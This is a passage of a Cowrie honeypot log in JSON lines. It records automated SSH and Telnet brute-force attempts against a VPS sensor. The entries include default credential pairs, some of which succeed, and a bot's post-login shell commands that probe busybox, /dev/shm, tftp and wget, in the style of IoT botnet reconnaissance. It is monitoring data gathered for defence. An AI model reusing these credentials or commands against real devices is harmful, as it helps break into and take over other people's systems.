],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.737398Z","src_ip":"212.227.235.229","session":"46a7fa27f8f9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.977035Z","src_ip":"212.227.125.160","session":"aeec80e37308"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.977838Z","src_ip":"212.227.125.160","session":"aeec80e37308"}
{"eventid":"cowrie.session.closed","duration":4.969170808792114,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:24.226981Z","src_ip":"212.227.125.160","session":"519f43cb3b7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:24.686982Z","src_ip":"212.227.235.229","session":"46a7fa27f8f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47129,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d0f0e64f250","protocol":"telnet","message":"New connection: 212.227.125.160:47129 (1.2.3.4:23) [session: 3d0f0e64f250]","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.272306Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.273813Z","src_ip":"212.227.125.160","session":"3d0f0e64f250"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 ","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 /Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.275272Z","src_ip":"212.227.125.160","session":"3d0f0e64f250"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.276547Z","src_ip":"212.227.125.160","session":"3d0f0e64f250"}
{"eventid":"cowrie.session.closed","duration":0.04231715202331543,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.312034Z","src_ip":"212.227.125.160","session":"3d0f0e64f250"}
{"eventid":"cowrie.login.failed","username":"debian","password":"root123","message":"login attempt [debian/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.567410Z","src_ip":"212.227.125.160","session":"aeec80e37308"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:25.927542Z","src_ip":"212.227.235.229","session":"46a7fa27f8f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45748,"dst_ip":"1.2.3.4","dst_port":22,"session":"22595f9134f0","protocol":"ssh","message":"New connection: 212.227.235.229:45748 (1.2.3.4:22) [session: 22595f9134f0]","sensor":"my-vps","timestamp":"2025-08-31T01:04:26.158252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:26.164944Z","src_ip":"212.227.235.229","session":"22595f9134f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:04:26.397335Z","src_ip":"212.227.235.229","session":"22595f9134f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37439,"dst_ip":"1.2.3.4","dst_port":23,"session":"1bcfbecc0810","protocol":"telnet","message":"New connection: 212.227.125.160:37439 (1.2.3.4:23) [session: 1bcfbecc0810]","sensor":"my-vps","timestamp":"2025-08-31T01:04:26.413615Z"}
{"eventid":"cowrie.session.closed","duration":0.0010883808135986328,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:26.414630Z","src_ip":"212.227.125.160","session":"1bcfbecc0810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47215,"dst_ip":"1.2.3.4","dst_port":23,"session":"0aae1ef3fb96","protocol":"telnet","message":"New connection: 212.227.125.160:47215 (1.2.3.4:23) [session: 0aae1ef3fb96]","sensor":"my-vps","timestamp":"2025-08-31T01:04:26.947202Z"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:27.219924Z","src_ip":"212.227.125.160","session":"aeec80e37308"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:04:27.342542Z","src_ip":"212.227.235.229","session":"22595f9134f0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:27.584125Z","src_ip":"212.227.235.229","session":"22595f9134f0"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:27.587574Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60826,"dst_ip":"1.2.3.4","dst_port":22,"session":"14b04d5e508e","protocol":"ssh","message":"New connection: 212.227.125.160:60826 (1.2.3.4:22) [session: 14b04d5e508e]","sensor":"my-vps","timestamp":"2025-08-31T01:04:29.367548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:29.368453Z","src_ip":"212.227.125.160","session":"14b04d5e508e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:04:29.440591Z","src_ip":"212.227.125.160","session":"14b04d5e508e"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:29.727294Z","src_ip":"212.227.125.160","session":"14b04d5e508e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:30.879934Z","src_ip":"212.227.125.160","session":"14b04d5e508e"}
{"eventid":"cowrie.session.closed","duration":8.000727415084839,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:34.947851Z","src_ip":"212.227.125.160","session":"0aae1ef3fb96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50207,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccae5bd5b39a","protocol":"telnet","message":"New connection: 212.227.125.160:50207 (1.2.3.4:23) [session: ccae5bd5b39a]","sensor":"my-vps","timestamp":"2025-08-31T01:04:34.980358Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32786,"dst_ip":"1.2.3.4","dst_port":22,"session":"73f59f0e1b17","protocol":"ssh","message":"New connection: 212.227.125.160:32786 (1.2.3.4:22) [session: 73f59f0e1b17]","sensor":"my-vps","timestamp":"2025-08-31T01:04:39.760075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:39.760987Z","src_ip":"212.227.125.160","session":"73f59f0e1b17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:04:39.834317Z","src_ip":"212.227.125.160","session":"73f59f0e1b17"}
{"eventid":"cowrie.session.closed","duration":4.968399286270142,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:39.948685Z","src_ip":"212.227.125.160","session":"ccae5bd5b39a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57064,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b2a95df2c6e","protocol":"telnet","message":"New connection: 212.227.125.160:57064 (1.2.3.4:23) [session: 4b2a95df2c6e]","sensor":"my-vps","timestamp":"2025-08-31T01:04:39.981918Z"}
{"eventid":"cowrie.session.closed","duration":0.001325368881225586,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:39.983161Z","src_ip":"212.227.125.160","session":"4b2a95df2c6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60957,"dst_ip":"1.2.3.4","dst_port":23,"session":"145ed5657737","protocol":"telnet","message":"New connection: 212.227.125.160:60957 (1.2.3.4:23) [session: 145ed5657737]","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.048689Z"}
{"eventid":"cowrie.session.closed","duration":0.001294851303100586,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.049892Z","src_ip":"212.227.125.160","session":"145ed5657737"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.068159Z","src_ip":"212.227.125.160","session":"73f59f0e1b17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33997,"dst_ip":"1.2.3.4","dst_port":23,"session":"1669771c8bd2","protocol":"telnet","message":"New connection: 212.227.125.160:33997 (1.2.3.4:23) [session: 1669771c8bd2]","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.118883Z"}
{"eventid":"cowrie.session.closed","duration":0.001295328140258789,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.120095Z","src_ip":"212.227.125.160","session":"1669771c8bd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57068,"dst_ip":"1.2.3.4","dst_port":23,"session":"863e1785d0e8","protocol":"telnet","message":"New connection: 212.227.125.160:57068 (1.2.3.4:23) [session: 863e1785d0e8]","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.184594Z"}
{"eventid":"cowrie.session.closed","duration":0.032956838607788086,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:40.217482Z","src_ip":"212.227.125.160","session":"863e1785d0e8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:41.253165Z","src_ip":"212.227.125.160","session":"73f59f0e1b17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51686,"dst_ip":"1.2.3.4","dst_port":22,"session":"b566ab5fe1b6","protocol":"ssh","message":"New connection: 212.227.125.160:51686 (1.2.3.4:22) [session: b566ab5fe1b6]","sensor":"my-vps","timestamp":"2025-08-31T01:04:50.186335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:50.187355Z","src_ip":"212.227.125.160","session":"b566ab5fe1b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:04:50.261431Z","src_ip":"212.227.125.160","session":"b566ab5fe1b6"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:50.488661Z","src_ip":"212.227.125.160","session":"b566ab5fe1b6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:51.641799Z","src_ip":"212.227.125.160","session":"b566ab5fe1b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60658,"dst_ip":"1.2.3.4","dst_port":23,"session":"e74707e06b87","protocol":"telnet","message":"New connection: 212.227.125.160:60658 (1.2.3.4:23) [session: e74707e06b87]","sensor":"my-vps","timestamp":"2025-08-31T01:04:52.761056Z"}
{"eventid":"cowrie.login.failed","username":"tech","password":"tech","message":"login attempt [tech/tech] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:52.993692Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"supervisor","message":"login attempt [supervisor/supervisor] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.224453Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.login.success","username":"root","password":"xc3511","message":"login attempt [root/xc3511] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.458052Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:04:53.477790Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.540289Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.542038Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.542991Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.544134Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.544765Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.545564Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox CAKKO","message":"CMD: cat /proc/mounts; /bin/busybox CAKKO","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.616807Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CAKKO","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CAKKO","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.683407Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox CAKKO","message":"CMD: tftp; wget; /bin/busybox CAKKO","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.748324Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.814626Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.817167Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"/bin/busybox CAKKO","message":"CMD: /bin/busybox CAKKO","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.881266Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.883652Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.885337Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.886181Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b1df2abac5c8ebcdb96eef95d5c032559a98fd816790e1e75e5cbecf4f3fd4a8","size":3550,"shasum":"b1df2abac5c8ebcdb96eef95d5c032559a98fd816790e1e75e5cbecf4f3fd4a8","duplicate":false,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/b1df2abac5c8ebcdb96eef95d5c032559a98fd816790e1e75e5cbecf4f3fd4a8 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.888089Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.session.closed","duration":1.1321887969970703,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:53.893356Z","src_ip":"212.227.125.160","session":"e74707e06b87"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1505,"dst_ip":"1.2.3.4","dst_port":22,"session":"afbde9e9a0a5","protocol":"ssh","message":"New connection: 102.88.137.80:1505 (1.2.3.4:22) [session: afbde9e9a0a5]","sensor":"my-vps","timestamp":"2025-08-31T01:04:55.944565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:55.945442Z","src_ip":"102.88.137.80","session":"afbde9e9a0a5"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:04:56.074703Z","src_ip":"102.88.137.80","session":"afbde9e9a0a5"}
{"eventid":"cowrie.login.failed","username":"ionela","password":"ionela123","message":"login attempt [ionela/ionela123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:56.631870Z","src_ip":"102.88.137.80","session":"afbde9e9a0a5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:57.764160Z","src_ip":"102.88.137.80","session":"afbde9e9a0a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52992,"dst_ip":"1.2.3.4","dst_port":22,"session":"8743dc72bc06","protocol":"ssh","message":"New connection: 212.227.125.160:52992 (1.2.3.4:22) [session: 8743dc72bc06]","sensor":"my-vps","timestamp":"2025-08-31T01:05:00.595702Z"}
